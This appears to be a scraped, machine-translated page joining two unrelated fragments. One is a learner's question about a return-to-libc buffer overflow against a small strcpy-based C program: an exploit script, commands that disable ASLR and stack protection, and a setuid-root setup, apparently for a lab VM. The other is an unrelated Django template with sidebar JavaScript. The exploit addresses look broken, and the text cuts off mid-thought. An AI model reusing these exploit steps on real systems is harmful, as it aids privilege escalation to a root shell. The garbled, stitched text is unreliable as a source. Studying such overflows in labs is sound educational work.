我必须使用exploit python脚本在ac程序中打开一个shell.我正在使用Ubuntu VM来执行此操作.
c程序:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buf[256];
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
到目前为止,我已经创建了exploit.py:
#!/usr/bin/env python
import struct
padding = "A"*(10)+"B"*(10)+"C"*(10)+"D"*(10)+"E"*(10)+"F"*(10)+"G"*(10)+"H"*(10)+"I"*(10)+"J"*(10)+"K"*(10)+"L"*(10)+"M"*(10)+"N"*(10)+"O"*(10)+"P"*(10)+"Q"*(10)+"R"*(10)+"S"*(10)+"T"*(10)+"U"*(10)+"V"*(10) +"W"*(10)+"X"*(10)+"Y"*(10)+"Z"*(7)
system = struct.pack("I", 0x0000060d)
return_after_system = "AAAA"
bin_sh = struct.pack("I",0xf7f61e8b)
print padding + system + return_after_system + bin_sh
我找到了/ bin/sh地址,我验证它是正确的地址然后我打包了结构.
在运行代码进行编译之前,我运行以下命令
sudo sysctl -w kernel.randomize_va_space=0
gcc -m32 -g -fno-stack-protector -o vulnerable -z execstack vulnerable.c
sudo chown root:root vulnerable
sudo chmod u+s vulnerable
然后我像这样运行程序
./vulnerable `python exploit.py`
但是它只输出以下没有shell
OUTPUT: …
HTML
{% load static %}
<link rel="stylesheet" type="text/css" href="{% static 'lessons/style.css' %}" />
<script>
function openNav() {
document.getElementById("mySidenav").style.width = "20%";
document.getElementById("main").style.marginLeft = "20%";
}
function closeNav() {
document.getElementById("mySidenav").style.width = "0";
document.getElementById("main").style.marginLeft= "20%";
}
</script>
<div id="mySidenav" class="sidenav">
<a href="javascript:void(0)" class="closebtn" onclick="closeNav()">×</a>
<a href="{% url 'home' %}" class="active">Home</a>
<a href = "{% url 'lessons:index' %}"class="active">Lessons</a>
<a href="{% url 'resources' %}"class="active">Resources</a>
</div>
<div id="main">
<span style="font-size:30px;cursor:crosshair;display:inline-block" onclick="openNav()">☰</span>
<h1>Exercise</h1>
<form id = "exercise" action= " ">
{% for question in lesson.question_set.all %}
{% …